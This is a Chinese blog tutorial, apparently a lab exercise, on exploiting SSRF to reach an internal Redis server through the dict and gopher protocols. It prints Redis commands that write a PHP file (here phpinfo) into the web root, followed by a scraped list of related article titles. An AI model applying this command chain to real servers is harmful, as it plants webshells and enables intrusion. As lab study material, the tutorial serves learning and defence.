目录

攻击环境搭建

利用gopher协议写入webshell


关于ssrf攻击,传送门 -》SSRF漏洞原理与利用方式 。当我们检测出一个网站存在SSRF漏洞的时候,我们就可以探测当前或者内网主机开放的端口,而这些端口往往我们从外网是不能直接探测到的,所以可以尝试利用ssrf探测内网开放的端口。

漏洞利用前提:

  • 知道网站根目录,这里假设知道了根目录
  • 根目录具有写文件的权限

攻击环境搭建

  • 操作系统:win7 x64,防火墙开启
  • SSRF漏洞环境—皮卡丘靶场
  • redis-5.0.10 x64

当开启防火墙后是探测不出redis端口的,所以我们利用ssrf探测内网redis

redis服务器搭建

下载后进行简单的配置

1. 关闭保护模式

打开 redis.windows.conf文件

1)将protected-mode yes修改为no,如下,关闭保护模式

2)接着找到bind 127.0.0.1在前面加上注释符,允许别的主机进行连接
# bind 127.0.0.1

然后启动redis

redis-server.exe redis.windows.conf

此时我们扫描主机的端口,6379显示为过滤的状态。而这里我们可以通过ssrf漏洞来探测外网不能探测到的内网端口

我们利用dict协议探测出当前服务器开启了6379端口

利用gopher协议写入webshell

gopher协议规则比较复杂,这里需要工具生成gopher

GitHub - firebroo/sec_tools

使用方法

编辑redis-over-gopher/redis.cmd为redis执行的命令,一句命令一行,比如它给出的例子。config set dir 为web的根目录地址,这里写入phpinfo()

flushall
config set dir C:\\Users\\Administrator.WIN2012\\Desktop\\phpStudy\\WWW
config set dbfilename shell.php
set 'webshell' '<?php phpinfo();?>'
save

编辑好后运行redis-over-gopher/redis-over-gopher.py


将生成的payload复制下来,再进行一次url编码

直接在浏览器漏洞所在url访问payload,或者使用burp发送

接着查看。发现生成了shell.php文件,访问文件

SSRF攻击Redis写入webshell相关推荐

  1. SSRF 302跳转 gopher协议攻击redis写入ssh公钥,实现远程无密登录(学习总结)

    一.SSRF漏洞 SSRF(Server Side Request Forgery,服务器端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞,因为求情是由服务器发出的,所以往往是利用S ...

  2. 利用SSRF攻击Redis

    前置知识 利用SSRF来攻击靶机的redis服务,需要涉及到的一些知识点: 1,Redis客户端和服务端通信过程,以及常用命令: 2,相关协议,例如dict://协议和gother协议的使用 dict ...

  3. Web漏洞之SSRF攻击汇总

    目录 靶场拓扑设计 x.x.x.x:8080 - 判断 SSRF 是否存在 172.72.23.21 - SSRF 获取本地信息 FILE 协议获取本地信息 172.72.23.1/24 - SSRF ...

  4. 实战 | SSRF攻击内网的实战案例

    0x01 苦逼的测试任务 某一天,我照常在学校的CTF群和学长吹水,突然管事的学长在群里发了一张图,这个月轮到我们学校对省内的某旅游相关企业进行漏洞测试.上面的老师自然而然把这个任务分配给我们CTF战 ...

  5. 利用redis写webshell

    redis和mongodb我之所见 最近自己在做一些个人的小创作.小项目,其中用到了mongodb和redis,最初可能对这二者没有深入的认识. 都是所谓的"非关系型数据库",有什 ...

  6. SSRF攻击实例解析

    ssrf攻击概述 很多web应用都提供了从其他的服务器上获取数据的功能.使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等.这个功能如果被恶意使用,可以利用存在缺陷的web应用作为 ...

  7. 【SSRF技巧拓展】————2、SSRF攻击实例解析

    ssrf攻击概述 很多web应用都提供了从其他的服务器上获取数据的功能.使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等.这个功能如果被恶意使用,可以利用存在缺陷的web应用作为 ...

  8. [安全科普]SSRF攻击实例解析

    litdg2013-12-18+20共1482300人围观 ,发现 33 个不明物体WEB安全 ssrf攻击概述 很多web应用都提供了从其他的服务器上获取数据的功能.使用用户指定的URL,web应用 ...

  9. Java RMI 服务易受 SSRF 攻击

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 安全研究员 Tobias Neitzel 发布文章指出,Java RMI 服务可遭服务器端请求伪造 (SSRF) 攻击. Java RMI 是在 ...

最新文章

  1. springboot~openfeign从JSON文件读取数据
  2. python的.arsort()函数的用法
  3. linux indent命令: 调整C原始代码文件的格式
  4. PyPDF2.utils.PdfReadError: Unexpected destination '/__WKANCHOR_2'
  5. 用python画多来a梦-python3里tkinter中canvas(画板)案例之哆啦A梦
  6. Mysql表的约束设计和关联关系设计
  7. aodv包头分析-上
  8. python自动化测试实战 虫师_Page Object 1 百度搜索实例 (虫师《selenium3自动化测试实战--基于Python语言笔记40》)...
  9. caffee学习中文指南(1)(1)
  10. java垃圾回收文档整理
  11. 机器学习综述论文笔记:Machine Learning: A Review of Learning Types
  12. Red Giant VFX Suite for mac(电影级视觉特效插件)
  13. 云计算技术基础【9】
  14. 程序员副业赚钱之道,实现月收入增加20K
  15. linux无法运行sssverify,Synopsys Design Compiler在fedora Core 9下面的安装
  16. 结绳4.0【基本功能】
  17. oracle存小数用 number(m,n)
  18. 10天学会英语常见词根后缀
  19. [HCIP-IoT Developer V2.5 题库] 201-216 题 华为
  20. SQLAlchemy的基础使用

热门文章

  1. 敌人的敌人是朋友的问题
  2. #for循环嵌套分析
  3. 第三方API对接常见问题
  4. 牛客 寻找第k大数字
  5. 微信公众号调取jssdk扫一扫功能,ios第一次进入页面调取失败(需刷新页面才能调取成功,Android正常)的解决方法
  6. 今天推荐几款好用的网站
  7. 软件版本号的意思是什么?从PC到安卓,带你了解版本号命名逻辑
  8. Percona MySQL Server 部署指南
  9. JavaScript-流程控制语句详解
  10. Android 常见面试问题